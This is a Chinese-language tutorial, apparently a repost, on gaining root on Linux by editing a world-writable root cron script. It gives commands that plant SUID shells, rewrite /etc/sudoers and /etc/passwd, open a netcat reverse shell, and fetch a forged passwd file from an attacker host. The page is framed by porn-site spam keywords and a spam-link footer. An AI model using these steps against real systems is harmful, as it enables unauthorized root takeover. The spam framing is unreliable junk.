成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

在Linux上通過可寫文件獲取Root權限的多種方式

系統 Linux 安全
在Linux中,一切都可以看做文件,包括所有允許/禁止讀寫執行權限的目錄和設備。當管理員為任何文件設置權限時,都應清楚并合理為每個Linux用戶分配應有的讀寫執行權限。在本文中我將為大家展示,如何利用Linux中具有寫入權限的文件/腳本來進行提權操作。

在Linux中,一切都可以看做文件,包括所有允許/禁止讀寫執行權限的目錄和設備。當管理員為任何文件設置權限時,都應清楚并合理為每個Linux用戶分配應有的讀寫執行權限。在本文中我將為大家展示,如何利用Linux中具有寫入權限的文件/腳本來進行提權操作。好了,話不多說。下面就進入我們的正題吧!

首先,我們來啟動我們的攻擊機并滲透進目標系統直至提權階段。這里假設我通過ssh成功登錄到了受害者機器,并訪問了非root用戶的終端。通過以下命令,我們可以枚舉所有具有可寫權限的二進制文件。

  1. find / -writable -type  f 2>/dev/null | grep -v "/proc/" 

可以看到在/lib/log路徑下有一個python文件,我們進入到該目錄并查看該文件的權限為777 

通過cat命令查看該文件內容,這是管理員添加的一個用來清除 /tmp中的所有垃圾文件的腳本,具體執行取決于管理員設置的定時間隔。獲取了這些信息后,攻擊者可以通過以下方式來執行提權操作。 

方法1

我們復制了/bin/sh到/tmp下并為/tmp/sh啟用了SUID。使用編輯器打開sanitizer.py并將 “rm -r /tmp/*” 中的內容替換為以下兩行: 

  1. os.system('cp /bin/sh /tmp/sh'
  2. os.system('chmod u+s /tmp/sh'

 

一段時間后,它將在/tmp目錄內創建一個具有SUID權限的sh文件,當你運行它時,你將會獲取root訪問權限。 

  1. cd /tmp 
  2. ls 
  3. ./sh 
  4. id 
  5. whoami 

下圖可以說明一切! 

方法2

同樣,你也可以將 “rm -r /tmp/*” 替換為以下內容:

  1. os.system(‘chmod u+s /bin/dash) 

 

一段時間后,它將為/bin/dash設置SUID權限,并且在運行時會給予root訪問權限。 

  1. /bin/dash 
  2. id 
  3. whoami 

如下圖所示: 

方法3

在這種方法中,我們在 rm -r /tmp/* 的位置粘貼了python反向shell連接代碼,并在新的終端中啟動了netcat偵聽。 

如上所述,經過一段時間后,我們通過netcat獲取了具有root訪問權限的反向shell。 

  1. nc -lvp 1234 
  2. id 
  3. whoami 

如下圖所示: 

方法4

這個方法挺有意思的,在下圖中大家可以看到我當前的用戶是沒有執行sudo命令的權限的。那我們就想辦法讓自己成為suoders文件成員。 

同樣,我們將 “rm -r /tmp/*” 替換為以下內容:

  1. os.system('echo "wernerbrandes ALL=(ALL) NOPASSWD: ALL" > /etc/sudoers'

 

過一段時間后,當你輸入“sudo -l”命令時,你會注意到,它已成為了sudo用戶的成員。此時我們只要輸入“sudo bash”就可以獲取root訪問權限。 

  1. sudo -l 
  2. sudo bash 
  3. id 

方法5

我們知道passwd在任何類linux的系統中都扮演著非常重要的角色,一旦攻擊者有機會可以修改此文件,那么它將會成為一種特權提升的動態方式。

同樣,我們也不會忽視這一點,使用cat命令讀取etc/passwd文件。

在這里你可以觀察到用戶名為nemo記錄的高亮條目,根據我的猜測UID:1000 & GID:1000表示它應該是管理員組的成員。

但我們的目標是通過編輯nemo記錄,使其成為root組的成員。因此,我們選擇并復制etc/passwd文件內的所有記錄,然后將它粘貼到一個空的文本文件中。 

然后在一個新的終端中使用openssl生成一個加鹽密碼并復制。

  1. openssl passwd -1 -salt abc 123 

 

現在將上面復制的加鹽密碼粘貼至用戶nemo記錄條目中的“X”處,并且將UID&GID更改為0,如圖所示。操作完成后,將文本文件保存為“passwd”,將該文件傳輸至目標系統,它將覆蓋原始passwd文件的內容。

 

  1. cd Desktop 
  2. python -m SimpleHTTPServer 80 

 

同樣,將 “rm -r /tmp/*” 替換為以下內容:

  1. os.system(‘chmod u+s /bin/cp) 

一段時間后,它會啟用/bin/cp的SUID位以復制任意文件。 

現在將被你修改過的passwd文件下載至目標系統的/tmp目錄中。讓我們來檢查一下/bin/cp是否啟用了SUID位,然后使用cp命令將修改的passwd文件復制到/etc/passwd中,這將覆蓋原始passwd文件的內容。 

  1. cd /tmp 
  2. wget http://192.168.1.103/passwd 
  3. ls -al /bin/cp 
  4. cp passwd /etc/passwd 

 

現在,我們鍵入以下命令查看修改內容是否已在passwd文件中生效。

  1. tail /etc/passwd 

可以看到修改內容已成功寫入! 

執行以下命令獲取root訪問權限: 

  1. su nemo 
  2. password 123 
  3. whoami 

 

責任編輯:未麗燕 來源: FreeBuf
相關推薦

2018-06-22 10:18:52

2013-07-11 09:51:15

2022-08-14 19:27:16

LinuxmacOS

2009-11-23 17:16:54

PHP獲取IP

2013-11-01 11:32:49

2010-03-03 14:17:02

Linux內核

2017-05-10 15:16:29

Linux系統目錄讀寫指定目錄

2011-07-04 13:36:26

linuxOracle

2017-05-08 17:20:01

Linux指定目錄讀寫權限

2023-09-03 18:55:51

2019-02-19 10:30:29

VirtualBoxKali Linux虛擬機

2010-01-27 09:56:31

linux超級權限root密碼

2009-07-06 18:36:21

linux要求可寫但不可刪

2019-10-09 16:50:48

SSHLinux遠程系統

2022-11-18 08:55:33

2019-03-31 08:50:44

LinuxWine游戲

2012-03-02 12:14:19

JavaJstackJmap

2022-06-26 06:31:25

Linux電子游戲

2019-02-19 09:00:45

Linux創建文件命令

2020-06-23 14:21:35

Linux系統功能
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 国产成人叼嘿视频在线观看 | 国产精品美女久久久久aⅴ国产馆 | av激情在线 | 欧美日韩视频在线第一区 | 日韩国产中文字幕 | 啪啪精品 | 亚洲国产精品一区二区三区 | 极品在线| 久久久久综合 | 免费观看www| 黄片毛片免费观看 | 成人二区 | av中文字幕网站 | 一区二区三区不卡视频 | 欧美精品在线免费 | 日韩和的一区二区 | 特黄毛片| 在线视频一区二区 | 成人在线免费 | 国产高清视频在线观看 | 国产免费观看一级国产 | 欧美激情一区二区三级高清视频 | 国产一区 | 91操操操 | 国产精品中文字幕在线观看 | 国产黄色在线观看 | 久久久久久久电影 | 日本不卡一区二区三区在线观看 | 亚洲激情在线观看 | 亚洲一区二区三区国产 | 羞羞的视频免费观看 | 国产精品精品久久久 | 久久久99国产精品免费 | 国产成人99久久亚洲综合精品 | 日本午夜网站 | 99久久精品国产一区二区三区 | 日本免费视频在线观看 | 亚洲综合大片69999 | 欧美精品久久久 | 91影院在线观看 | www.精品一区 |